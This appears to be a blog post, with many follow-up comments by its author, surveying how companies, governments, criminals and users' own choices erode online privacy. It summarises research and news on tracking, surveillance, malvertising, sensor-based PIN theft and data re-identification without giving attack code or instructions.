There are four main types of entity motivated to violate your privacy:
- Companies: who can monetize this information directly by selling it and indirectly by exploiting it in their internal business. Tim Wu's The Attention Merchants: The Epic Scramble to Get Inside Our Heads is a valuable overview of this process, as is Maciej Cegłowski's What Happens Next Will Amaze You.
- Governments: both democratic and authoritarian governments at all levels from nations to cities are addicted to violating the privacy of citizens and non-citizens alike, ostensibly in order to "keep us safe", but in practice more to avoid loss of power. Parts of Wu's book cover this too, but it at least since Snowden's revelations it has rarely been far from the headlines.
- Criminals: can be even more effective at monetizing your private information than companies.
- Users: you are motivated to give up your privacy for trivial rewards:
More than 70% of people would reveal their computer password in exchange for a bar of chocolate, a survey has found.
Companies
Cliff Lynch has a long paper up at First Monday entitled The rise of reading analytics and the emerging calculus of reader privacy in the digital world:It discusses what data is being collected, to whom it is available, and how it might be used by various interested parties (including authors). I explore means of tracking what’s being read, who is doing the reading, and how readers discover what they read.Many months ago Cliff asked me to review a draft, but the final version differs significantly from the draft I reviewed. Cliff divides the paper into four sections:
- Introduction: Who’s reading what, and who knows what you’re reading?
- Collecting data
- Exploiting data
- Some closing thoughts
Cliff agrees in less dramatic language with Maciej Cegłowski's Haunted by Data, and his analogy between stored data and nuclear waste:
Those trying to protect reader privacy gradually realized that the best guarantee of such privacy was to collect as little data as possible, and to retain what had to be collected as briefly as possible. The hard won lesson: if it exists, it will ultimately be subpoenaed or seized, and used against readers in steadily less measured and discriminating ways over time.Cliff notices, as did Sam Kome, that readers are now tracked at the page level:
One of the byproducts of this transformation is a major restructuring of ideas and assumptions about reader privacy in light of the availability of information about what is being read, who is reading it, and (a genuinely new development) exactly how it is being read, including the end to frustrating reliance upon purchase, borrowing, or downloading as surrogate indicators for actually reading the work in question. ... one might wish for more than sparse anecdote on the ways and extents to which very detailed data on how a given book is (or is not) read, and by whom, actually benefits the various interested parties: authors, publishers, retailers, platform providers, and even readers.Cliff points out an important shift in the rhetoric about privacy:
Historically, most of the language has been about competing values and how they should be prioritized and balanced, using charged and emotional phrases: “reader privacy,” “intellectual freedom,” “national security,” “surveillance,” “accountability,” “protecting potential victims” ... These conversations are being supplanted by a sterile and anodyne, value-free discussion of “analytics:” reader analytics, learning analytics, etc. These are presented as tools that smart and responsible modern organizations are expected to employ; indeed, not doing analytics is presented as suggesting some kind of management failure or incompetence in many quarters. The operation of analytics systems, ... tends to shift discussions from whether data should be collected to what we can do with it, and further suggests that if we can do something with it, we should.Privacy is among the reasons readers have for using ad-blockers; the majority of the bytes they eliminate are not showing you ads but implementing trackers. The Future of Ad Blocking: An Analytical Framework and New Techniques by Grant Storey, Dillon Reisman, Jonathan Mayer and Arvind Narayanan reports on several new ad-blocking technologies, including one based on laws against misleading advertising:
ads must be recognizable by humans due to legal requirements imposed on online advertising. Thus we propose perceptual ad blocking which works radically differently from current ad blockers. It deliberately ignores useful information in markup and limits itself to visually salient information, mimicking how a human user would recognize ads. We use lightweight computer vision techniques to implement such a tool and show that it defeats attempts to obfuscate the presence of ads.They are optimistic that ad-blockers will win out:
Our second key observation is that even though publishers increasingly deploy scripts to detect and disable ad blocking, ad blockers run at a higher privilege level than such scripts, and hence have the upper hand in this arms race. We borrow ideas from rootkits to build a stealthy adblocker that evades detection. Our approach to hiding the presence and purpose of a browser extension is general and might be of independent interest.I don't agree. The advent of DRM for the Web requires that the DRM implementation run at a higher privilege level than the ad-blocker, and that it prevent less-privileged code observing the rendered content (less it be copied). It is naive to think that advertisers will not notice and exploit this capability.
Governments
As usual, Maciej Cegłowski describes the situation aptly:We're used to talking about the private and public sector in the real economy, but in the surveillance economy this boundary doesn't exist. Much of the day-to-day work of surveillance is done by telecommunications firms, which have a close relationship with government. The techniques and software of surveillance are freely shared between practitioners on both sides. All of the major players in the surveillance economy cooperate with their own country's intelligence agencies, and are spied on (very effectively) by all the others.Steven Bellovin, Matt Blaze, Susan Landau and Stephanie Pell have a 101-page review of the problems caused by the legacy model of communication underlying surveillance law in the Harvard Journal of Law and Technology entitled Its Too Complicated: How The Internet Upends Katz, Smith and Electronic Surveillance Law. Its clearly important but I'm only a short way into it, I may have more to say about it later.
And this, of course, assumes that the government abides by the law. Marcy Wheeler disposes of that idea:
All of which is to say that the authority that the government has been pointing to for years to show how great Title VII is is really a dumpster fire of compliance problems.and also:
And still, we know very little about how this authority is used.
one reason NSA analysts were collecting upstream data is because over three years after DOJ and ODNI had figured out analysts were breaking the rules because they forgot to exclude upstream from their search, they were still doing so. Overseers noted this back in 2013!
Criminals
The boundaries between government entities such as intelligence agencies and law enforcement and criminals have always been somewhat fluid. The difficulty of attributing activity on the Internet (also here) to specific actors has made them even more fluid:Who did it? Attribution is fundamental. Human lives and the security of the state may depend on ascribing agency to an agent. In the context of computer network intrusions, attribution is commonly seen as one of the most intractable technical problems, as either solvable or not solvable, and as dependent mainly on the available forensic evidence. But is it? Is this a productive understanding of attribution? — This article argues that attribution is what states make of it.The most important things to keep private are your passwords and PINs. They're the primary target for the bad guys, who can use them to drain your bank accounts. Dan Goodin at Ars Technica has an example of how incredibly hard it is to keep them secret. In Meet PINLogger, the drive-by exploit that steals smartphone PINs, he reports on Stealing PINs via mobile sensors: actual risk versus user perception by Maryam Mehrnezhad, Ehsan Toreini, Siamak F. Shahandashti and Feng Hao. Goodin writes:
The demonstrated keylogging attacks are most useful at guessing digits in four-digit PINs, with a 74-percent accuracy the first time it's entered and a 94-percent chance of success on the third try. ... The attacks require only that a user open a malicious webpage and enter the characters before closing it. The attack doesn't require the installation of any malicious apps.Malvertising, using ad servers to deliver malware, is a standard technique for the bad guys, and this attack can use it:
Malicious webpages—or depending on the browser, legitimate sites serving malicious ads or malicious content through HTML-based iframe tags—can mount the attack by using standard JavaScript code that accesses motion and orientation sensors built into virtually all iOS and Android devices. To demonstrate how the attack would work, researchers from Newcastle University in the UK wrote attack code dubbed PINLogger.js. Without any warning or outward sign of what was happening, the JavaScript was able to accurately infer characters being entered into the devices.The authors are pessimistic about blocking attacks using sensor data:
"That means whenever you are typing private data on a webpage [with] some advert banners ... the advert provider as part of the page can 'listen in' and find out what you type in that page," ... "Or with some browsers as we found, if you open a page A and then another page B without closing page A (which most people do) page A in the background can listen in on what you type in page B."
Access to mobile sensor data via JavaScript is limited to only a few sensors at the moment. This will probably expand in the future, specially with the rapid development of sensor-enabled devices in the Internet of things (IoT). ... Many of the suggested academic solutions either have not been applied by the industry as a practical solution, or have failed. Given the results in our user studies, designing a practical solution for this problem does not seem to be straightforward. ... After all, it seems that an extensive study is required towards designing a permission framework which is usable and secure at the same time. Such research is a very important usable security and privacy topic to be explored further in the future.The point is not to focus on this particular channel, but to observe that it is essentially impossible to enumerate and block all the channels by which private information can leak from any computer connected to the Internet.
Users
Because it is effectively impossible for you to know what privacy risks you are running, you are probably the main violator of your privacy on the Internet, for two main reasons:- You have explicitly and implicitly agreed to Terms of Service (and here) that give up your privacy rights in return for access to content. Since the content probably isn't that important to you, your privacy can't be that important either.
- You have not taken the simple precautions necessary to maintain privacy by being anonymous when using the Web. Techniques such as cookie syncing and browser fingerprinting mean that even using Tor isn't enough. Even though Tor obscures your IP address, if you're using the same browser as you did without Tor or when you logged in to a site, the site will know its you. Fortunately, there is a very simple way to avoid these problems. Tails (The Amnesic Incognito Live System) can be run from a USB flash drive or in a VM. Every time it starts up it is in a clean state. The browser looks the same to a Web site as every other Tails browser. Use it any time privacy is an issue, from watching pr0n to searching for medical information.
Update:
At The Atlantic, Arvind Narayanan and Dillon Reisman's The Thinning Line Between Commercial and Government Surveillance reports:As part of the Princeton Web Transparency and Accountability Project, we’ve been studying who tracks you online and how they do it. Here’s why we think the fight over browsing histories is vital to civil liberties and to a functioning democracy.They stress the effectiveness of the tracking techniques I mentioned above:
Privacy doesn’t merely benefit individuals; it fundamentally shapes how society functions. It is crucial for marginalized communities and for social movements, such as the fight for marriage equality and other once-stigmatized views. Privacy enables these groups to network, organize, and develop their ideas and platforms before challenging the status quo. But when people know they’re being tracked and surveilled, they change their behavior. This chilling effect hurts our intellectual freedoms and our capacity for social progress.
Web tracking today is breathtaking in its scope and sophistication. There are hundreds of entities in the business of following you from site to site, and popular websites embed about 50 trackers on average that enable such tracking. We’ve also found that just about every new feature that’s introduced in web browsers gets abused in creative ways to “fingerprint” your computer or mobile device. Even identical looking devices tend to behave in subtly different ways, such as by supporting different sets of fonts. It’s as if each device has its own personality. This means that even if you clear your cookies or log out of a website, your device fingerprint can still give away who you are.And that, even if used by companies, governments (and ISPs) can piggy-back on them:
Worse, the distinction between commercial tracking and government surveillance is thin and getting thinner. The satirical website The Onion once ran a story with this headline: “CIA's ‘Facebook’ Program Dramatically Cut Agency's Costs.” Reality isn’t far off. The Snowden leaks revealed that the NSA piggybacks on advertising cookies, and in a technical paper we showed that this can be devastatingly effective. Hacks and data breaches of commercial systems have also become a major part of the strategies of nation-state actors.Ironically, The Atlantic's web-site is adding tracking information to their article's URL (note the 524592):
>https://www.theatlantic.com/technology/archive/2017/05/the-thinning-line-between-commercial-and-government-surveillance/524952/and to the attributes of the links in it:
data-omni-click="r'article',r'link',r'6',r'524952'"At Gizmodo, Kashmir Hill's Uber Doesn’t Want You to See This Document About Its Vast Data Surveillance System is a deep dive into the incredibly detailed information Uber's database maintains about each and every Uber user. It is based on information briefly revealed in a wrongful termination lawsuit, before Uber's lawyers got it sealed.
For two days in October, before Uber convinced the court to seal the material, one of Spangenberg’s filings that was publicly visible online included a spreadsheet listing more than 500 pieces of information that Uber tracks for each of its users. ...Both articles are must-reads.
For example, users give Uber access to their location and payment information; Uber then slices and dices that information in myriad ways. The company holds files on the GPS points for the trips you most frequently take; how much you’ve paid for a ride; how you’ve paid for a ride; how much you’ve paid over the past week; when you last canceled a trip; how many times you’ve cancelled in the last five minutes, 10 minutes, 30 minutes, and 300 minutes; how many times you’ve changed your credit card; what email address you signed up with; whether you’ve ever changed your email address.
Continuing the theme of how difficult it is to protect your privacy, todays contribution is Stealing Windows credentials using Google Chrome by Bosko Stankovic:
ReplyDelete"This article describes an attack which can lead to Windows credentials theft, affecting the default configuration of the most popular browser in the world today, Google Chrome, as well as all Windows versions supporting it."
I'm a big fan of Maciej Cegłowski's barn-burning speeches. The one he gave at re:publica 2017 on May 10 is absolutely a must-watch for anyone concerned about privacy.
ReplyDeleteMaciej Cegłowski's text is here. Some key quotes:
ReplyDelete"Facebook is the dominant social network in Europe, with 349 million monthly active users. Google has something like 94% of market share for search in Germany. The servers of Europe are littered with the bodies of dead and dying social media sites. The few holdouts that still exist, like Xing, are being crushed by their American rivals.
In their online life, Europeans have become completely dependent on companies headquartered in the United States.
And so Trump is in charge in America, and America has all your data. This leaves you in a very exposed position. US residents enjoy some measure of legal protection against the American government. Even if you think our intelligence agencies are evil, they’re a lawful evil. They have to follow laws and procedures, and the people in those agencies take them seriously.
But there are no such protections for non-Americans outside the United States. The NSA would have to go to court to spy on me; they can spy on you anytime they feel like it. ... And now those corporations have to deal with Trump. How hard do you think they’ll work to defend European interests?"
and:
"Part of this concentration is due to network effects, but a lot of it is driven by the problem of security. If you want to work online with any measure of convenience and safety, you must choose a feudal lord who is big enough to protect you."
and:
"Each of the big five companies, with the important exception of Apple, has made aggressive user surveillance central to its business model. This is a dilemma of the feudal internet. We seek protection from these companies because they can offer us security. But their business model is to make us more vulnerable, by getting us to surrender more of the details of our lives to their servers, and to put more faith in the algorithms they train on our observed behavior.
These algorithms work well, and despite attempts to convince us otherwise, it’s clear they work just as well in politics as in commerce. So in our eagerness to find safety online, we’ve given this feudal Internet the power to change our offline world in unanticipated and scary ways."
Google now has visibility into your offline credit-card transactions:
ReplyDelete"Google has begun using billions of credit-card transaction records to prove that its online ads are prompting people to make purchases – even when they happen offline in brick-and-mortar stores, the company said Tuesday.
The advance allows Google to determine how many sales have been generated by digital ad campaigns, a goal that industry insiders have long described as “the holy grail” of online advertising. But the announcement also renewed long-standing privacy complaints about how the company uses personal information.
To power its multibillion-dollar advertising juggernaut, Google already analyzes users’ Web browsing, search history and geographic locations, using data from popular Google-owned apps like YouTube, Gmail, Google Maps and the Google Play store. All that information is tied to the real identities of users when they log into Google’s services.
The new credit-card data enables the tech giant to connect these digital trails to real-world purchase records in a far more extensive way than was possible before."
A newly discovered ad-blocker-aware malvertising campaign called RoughTed is in the wild:
ReplyDelete"Traffic comes from thousands of publishers, some ranked in Alexa's top 500 websites. Contaminated domains accumulated over half a billion visits in the past three months alone, according to security firm Malwarebytes."
Details from Malwarebytes here.
See also s Privacy Still a Big Deal Today? by Kartik Hosanagar and Tai Bendit from the Wharton School:
ReplyDelete"To address the [ad-blocker] issue, the Interactive Advertising Bureau (IAB), an advertising industry organization, has proposed the LEAN advertising program.
LEAN — an acronym for light, encrypted, ad choice supported, non-invasive ads — suggests a number of guidelines aimed at protecting user privacy and improving their overall experience with interactive ads. Among the guidelines is the expectation of compliance with the Digital Advertising Alliance’s consumer privacy program. It’s too soon to tell whether LEAN will be widely adopted, but the initiative shows how consumers can take control and get the industry to take action."
Riiiight.
At The Register, Thomas Calburn's In detail: How we are all pushed, filed, stamped, indexed, briefed, debriefed or numbered – by online biz all day discusses a report from Cracked Labs on surveillance capitalism:
ReplyDelete"Among poker players, it's commonly understood that if you look around the table and you don't see the sucker, it's you. The situation is the same in the knowledge economy because you can't see anything. There's almost no transparency into how data gets bought, sold, and used to make decisions that affect people's lives. When people make decisions about the information they share, they seldom understand how that data will be used or how it might affect them."
At The Register, John Leyden's Banking websites are 'littered with trackers' ogling your credit risk discusses a report from eBlocker:
ReplyDelete"A new study has warned that third-party trackers litter banking websites and the privacy-invading tech is being used to rate surfers' creditworthiness.
Among the top 10 financial institution websites visited in the US and UK, there are 110 third-party trackers snooping on surfers each time they visit."
Cory Doctorow at Boing Boing points me to Paul Farrell's The Medicare machine: patient details of 'any Australian' for sale on darknet:
ReplyDelete"The price for purchasing an Australian’s Medicare card details is 0.0089 bitcoin, which is equivalent to US$22.
Guardian Australia has verified that the seller is making legitimate Medicare details of Australians available by requesting the data of a Guardian staff member.
The darknet vendor says they are “exploiting a vulnerability which has a much more solid foundation which means not only will it be a lot faster and easier for myself, but it will be here to stay. I hope, lol.”
The listing continues: “Purchase this listing and leave the first and last name, and DOB of any Australian citizen, and you will receive their Medicare patient details in full.”
The vendor said they would soon create a “mass batch requesting of details”.
The seller is listed as a highly trusted vendor on the site and has received dozens of positive sale reviews."
Note that what is for sale in Australia is not a patient medical record just the details on the Medicare card which enable identity theft.
ReplyDeleteThomas Claburn's Revealed: The naughty tricks used by web ads to bypass blockers looks at the arms race between advertisers and users:
ReplyDelete"The company's technology disguises third-party network requests so they appear to be first-party network requests. This allows ad services used by website publishers to place cookies and serve ads that would otherwise by blocked by the browser's same-origin security model."
And:
"Uponit provides publishing clients with JavaScipt code that attempts to bypass content blocking. "Our JavaScript detects all blocked ad calls, fully recreates them (including targeting) and communicates them to our servers through a secure, undetectable channel that bypasses ad blockers," the company explains on its website."
From the user's point of view, these are all malware. The companies' excuses for peddling malware are an entertaining read.
Cliff Lynch points me to Jonathan Albright's Who Hacked the Election? Ad Tech did. Through “Fake News,” Identify Resolution and Hyper-Personalization which reveals that fringe "fake news" and propaganda sites are simply fronts for major AdTech companies suchas Facebook, Axciom, Google and a host of smaller, less well-known companies:
ReplyDelete"The conclusion: While this set of “fake news” sites might not have the sheer quantity of ad tech that, say, the Alexa 500 have, the behavioral targeting and identity resolution technologies associated with many of these conspiracy, hyper-partisan, and propaganda sites are as sophisticated as it gets.
Facebook Custom Audiences — near the center of the graph above — for example, can be used to easily target voters in real life based on curated lists from something as simple as an Excel workbook. But most often this is done professionally through a “trusted data partner” like Acxiom (alarming, since example #1, the “LiveRamp” tracker above, is part of the same company)"
It isn't as if all this Web advertising actually works. At The Register Thomas Claburn writes:
ReplyDelete"'It's about 60 to 100 per cent fraud, with an average of 90 per cent, but it is not evenly distributed,' said Augustine Fou, an independent ad fraud researcher, in a report published this month.
... Among quality publishers, Fou reckons $1 spent buys $0.68 in ads actually viewed by real people. But on ad networks and open exchanges, fraud is rampant.
With ad networks, after fees and bots – which account for 30 per cent of traffic – are taken into account, $1 buys $0.07 worth of ad impressions viewed by real people. With open ad exchanges – where bots make up 70 per cent of traffic – that figure is more like $0.01. In other words, web adverts displayed via these networks just aren't being seen by actual people, just automated software scamming advertisers."
Mark St. Cyr asks Is Facebook Staring Down Its “AOL Moment?”, pointing out that once AOL jumped the shark its collapse was rapid. He notes that:
ReplyDelete"Facebook is, for all intents and purposes, an advertising tool for advertisers only. It derives nearly all its revenue from advertisers. i.e., If there’s no advertisers buying on Facebook – there’s no Facebook."
And that it isn't merely the world's biggest advertiser who is backing away:
"The first shot across the proverbial bow was ... when P&G™ announced it was pulling ad dollars from what was considered FB’s ultimate ad model and raison d’être, i.e., targeted ads. The reason? All that targeting (via all that charged-for data) wasn’t hitting the mark."
But also the world's biggest ad agency:
"This past week none other that WPP™, which just so happens to be the world’s largest ad company, stock value plummeted after reporting dismal earnings, and “terrible” guidance."
At Techdirt, Karl Bode reports that:
ReplyDelete"A new study out of Princeton recently constructed a fake home, filled it with real IOT devices, and then monitored just how much additional data an ISP could collect on you based in these devices' network traffic. Their findings? It's relatively trivial for ISPs to build even deeper behavior profiles on you based on everything from your internet-connected baby monitor to your not so smart vibrator."
And notes that even using a VPN doesn't help much.
Alexander Muse claims that How the NSA Identified Satoshi Nakamoto was by using stylometry:
ReplyDelete"Satoshi has taken great care to keep his identity secret employing the latest encryption and obfuscation methods in his communications. Despite these efforts (according to my source at the DHS) Satoshi Nakamoto gave investigators the only tool they needed to find him — his own words.
Using stylometry one is able to compare texts to determine authorship of a particular work. Throughout the years Satoshi wrote thousands of posts and emails and most of which are publicly available. According to my source, the NSA was able to the use the ‘writer invariant’ method of stylometry to compare Satoshi’s ‘known’ writings with trillions of writing samples from people across the globe."
So, not just privacy but pseudonymity is dead.
The title of Karl Bode's CCTV + Lip-Reading Software = Even Less Privacy, Even More Surveillance speaks for itself.
ReplyDeleteGo read Bruce Schneier's interview with the Harvard Gazette:
ReplyDelete"Consumers are concerned about their privacy and don’t like companies knowing their intimate secrets. But they feel powerless and are often resigned to the privacy invasions because they don’t have any real choice. People need to own credit cards, carry cellphones, and have email addresses and social media accounts. That’s what it takes to be a fully functioning human being in the early 21st century. This is why we need the government to step in."
Catalin Cimpanu combines two of my favorite themes in Malvertising Campaign Mines Cryptocurrency Right in Your Browser:
ReplyDelete"Malware authors are using JavaScript code delivered via malvertising campaigns to mine different cryptocurrencies inside people's browsers, without their knowledge. ... According to a recent report, at least 1.65 million computers have been infected with cryptocurrency mining malware this year so far.
BITAG Announces Technical Review Focused on Internet Data Collection and Privacy:
ReplyDelete"The Broadband Internet Technical Advisory Group (BITAG) will review the technical aspects of Internet of data collection and privacy. This review will result in a report with an anticipated publication date in early 2018."
The incentives for maintaining privacy can't compete with the incentives to leak. By resigning from Equifax, now ex-CEO Richarrd Smith walks away with $90M from the catastrophic breach:
ReplyDelete"The CEO of Equifax is retiring from the credit reporting bureau with a pay day worth as much as $90 million—or roughly 63 cents for every customer whose data was potentially exposed in its recent security breach."
63 cents is a trivial addition to the costs his incompetence imposed on each of us, so maybe that's OK. But it certainly isn't a way to ensure that future CEOs in charge of our personal information are less careless
Facebook builds a profile of you that you cannot opt out of, even if you never use Facebook, reports Kashmir Hill at Gizmodo:
ReplyDelete"Behind the Facebook profile you’ve built for yourself is another one, a shadow profile, built from the inboxes and smartphones of other Facebook users. Contact information you’ve never given the network gets associated with your account, making it easier for Facebook to more completely map your social connections."
Privacy Pass is a really interesting development, allowing users to authenticate to services repeatedly without allowing the service to track them:
ReplyDelete"Privacy Pass interacts with supporting websites to introduce an anonymous user-authentication mechanism. In particular, Privacy Pass is suitable for cases where a user is required to complete some proof-of-work (e.g. solving an internet challenge) to authenticate to a service. In short, the extension receives blindly signed ‘passes’ for each authentication and these passes can be used to bypass future challenge solutions using an anonymous redemption procedure. For example, Privacy Pass is supported by Cloudflare to enable users to redeem passes instead of having to solve CAPTCHAs to visit Cloudflare-protected websites.
The blind signing procedure ensures that passes that are redeemed in the future are not feasibly linkable to those that are signed. We use a privacy-preserving cryptographic protocol based on ‘Verifiable, Oblivious Pseudorandom Functions’ (VOPRFs) built from elliptic curves to enforce unlinkability. The protocol is exceptionally fast and guarantees privacy for the user. As such, Privacy Pass is safe to use for those with strict anonymity restrictions."
Tip of the hat to Rebecca Hill at The Register.
The explanation of the Privacy Pass design is quite understandable once you realize that:
ReplyDelete"The security of elliptic curve cryptography depends on the ability to compute a point multiplication and the inability to compute the multiplicand given the original and product points."
No boundaries: Exfiltration of personal data by session-replay scripts is a paper you need to read right now:
ReplyDelete"You may know that most websites have third-party analytics scripts that record which pages you visit and the searches you make. But lately, more and more sites use “session replay” scripts. These scripts record your keystrokes, mouse movements, and scrolling behavior, along with the entire contents of the pages you visit, and send them to third-party servers. Unlike typical analytics services that provide aggregate statistics, these scripts are intended for the recording and playback of individual browsing sessions, as if someone is looking over your shoulder."
Well, Duh! Anonymized location-tracking data proves anything but: Apps squeal on you like crazy:
ReplyDelete"Anonymized location data won't necessarily preserve your anonymity.
M. Keith Chen, associate professor of economics at UCLA's Anderson School of Management, and Ryne Rohla, a doctoral student at Washington State University, accomplished this minor miracle of data science by assuming that the GPS coordinates transmitted by mobile phones between 1am and 4am over several weeks represent the location of device owners' homes."
Google collects Android users’ locations even when location services are disabled reports Keith Collins at Quartz:
ReplyDelete"Many people realize that smartphones track their locations. But what if you actively turn off location services, haven’t used any apps, and haven’t even inserted a carrier SIM card?
Even if you take all of those precautions, phones running Android software gather data about your location and send it back to Google when they’re connected to the internet, a Quartz investigation has revealed.
Since the beginning of 2017, Android phones have been collecting the addresses of nearby cellular towers—even when location services are disabled—and sending that data back to Google. The result is that Google, the unit of Alphabet behind Android, has access to data about individuals’ locations and their movements that go far beyond a reasonable consumer expectation of privacy."
Hat tip to Andrew Orlowski at The Register, who writes:
"you may want to consider two questions about a story that goes to the heart of the human relationship with technology: "Who is in control, here?" Firstly, can you turn it off? If you can't turn it off then obviously you are not in control. Secondly, do you know it's happening? If you don't know it's happening, you're not even in a position to turn it off. This entirely changes the terms of that human-machine relationship.
What Google did is also illegal here because consent is the key to data protection in the EU."
The Citizen Lab has a fascinating report on the Ethiopian government's use of commercial spyware from Israeli company Cyberbit to target dissidents, and the company's sales efforts to other unsavory governments.
ReplyDeleteBrian Merchant's How Email Open Tracking Quietly Took Over the Web shows why you should never read e-mail in HTML, only in plain text. Hat tip to Cory Doctorow:
ReplyDelete" It is routine for companies -- and even individuals -- to send emails with "beacons," transparent, tiny images that have to be fetched from a server. Through these beacons, companies can tell whether you've opened an email, whom you've forwarded it to, and even your location from moment to moment.
The embedding of full-fledged HTML renderers in email and the growth of browser-based email clients mean that the tracking can also be effected through downloadable fonts or other elements -- anything that triggers loading a unique, per-recipient URL from a surveillance marketing company's server.
The surveillance adoption curve means that these techniques have moved from marketing and hackers to individuals, and one analyst's report estimates that 19% of "conversational" email contains trackers."
" Even the most stringent privacy rules have massive loopholes: they all allow for free distribution of "de-identified" or "anonymized" data that is deemed to be harmless because it has been subjected to some process.
ReplyDeleteBut the reality of "re-identification" attacks tells a different story: ... datasets are released on the promise that they have been de-identified, only to be rapidly (and often trivially) re-identified, putting privacy, financial security, lives and even geopolitical stability at risk." writes Cory Doctorow at Boing Boing, pointing to A Precautionary Approach to Big Data Privacy by Arvind Narayanan, Joanna Huey and Edward Felten:
"even staunch proponents of current de-identification methods admit that they are inadequate for high-dimensional data. These high-dimensional datasets, which contain many data points for each individual’s record, have become the norm: social network data has at least a hundred dimensions and genetic data can have millions. We expect that datasets will continue this trend towards higher dimensionality as the costs of data storage decrease and the ability to track a large number of observations about a single individual increase."
"Religiously turning off location services might not save you from having your phone tracked: a paper from a group of IEEE researchers demonstrates tracking when GPS and Wi-Fi are turned off.
ReplyDeleteAnd, as a kicker: at least some of the data used in the attack, published this week on arXiv, can be collected without permission, because smartphone makers don't consider it sensitive." writes Richard Chirgwin at The Register.
Security through obscurity does work in some cases. Even after a deep learning system read 130K privacy policy statements it was only able to:
ReplyDelete"produce a correct answer among its top-3 results for 82% of the test questions"